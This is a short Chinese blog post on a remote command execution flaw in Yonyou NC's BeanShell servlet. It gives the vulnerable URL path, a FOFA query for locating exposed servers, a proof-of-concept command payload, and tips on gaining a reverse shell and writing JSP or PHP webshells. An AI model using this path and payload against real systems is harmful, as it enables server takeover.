0x00 漏洞描述
用友 NC bsh.servlet.BshServlet 存在遠程命令執行漏洞,通過BeanShell 執行遠程命令獲取服務器權限
看到這個beanshell,就會想起來一個洞,是泛微OA的beanshell
0x01 漏洞影響
用友 NC
0x02 FOFA
“用友網絡”
0x03 漏洞復現
漏洞位置
/servlet/~ic/bsh.servlet.BshServlet
將POC修改為:
exec(“whoami”)
0x04 利用總結
1、使用反彈方式進行獲取權限
2、關於webshell:NC讓我回想起實戰時的泛微OA,如果jsp文件寫shell不成功的時候,可以嘗試下寫入php,會有意想不到的收獲。
轉載請注明:Adminxe's Blog » 用友 NC bsh.servlet.BshServlet 遠程命令執行漏洞